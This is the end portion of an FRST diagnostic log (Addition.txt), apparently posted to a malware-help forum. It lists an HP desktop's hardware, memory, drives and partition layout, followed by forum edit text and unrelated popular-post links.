BIOS: AMI 80.06 04/01/2015
Motherboard: Hewlett-Packard 2B2C
Processor: Intel® Core™ i5-4460 CPU @ 3.20GHz
Percentage of memory in use: 20%
Total physical RAM: 12191.91 MB
Available physical RAM: 9639.31 MB
Total Virtual: 15647.91 MB
Available Virtual: 13397.6 MB

==================== Drives ================================

Drive c: (Windows) (Fixed) (Total:910.16 GB) (Free:627.8 GB) NTFS
Drive d: (Recovery Image) (Fixed) (Total:19.03 GB) (Free:2.41 GB) NTFS ==>[system with boot components (obtained from drive)]

\\?\Volume{b0b03bc2-4981-4227-bc23-7ff36e0603e4}\ (Windows RE tools ) (Fixed) (Total:1 GB) (Free:0.69 GB) NTFS
\\?\Volume{1a45155e-4097-4181-b206-7d3a3c1a5357}\ () (Fixed) (Total:0.84 GB) (Free:0.41 GB) NTFS
\\?\Volume{2ad13087-dc91-427b-a535-4ba3e252b307}\ (SYSTEM) (Fixed) (Total:0.35 GB) (Free:0.28 GB) FAT32

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: E6684562)

Partition: GPT.

==================== End of Addition.txt =======================

Attached Files

Edited by Oh My!, 29 April 2020 - 09:00 PM.

Comments

Popular Posts

System detected an overrun of a stack-based buffer in this application [FIX] - Windows Report

Valorant anti-cheat lead answers many questions on Reddit - Millenium US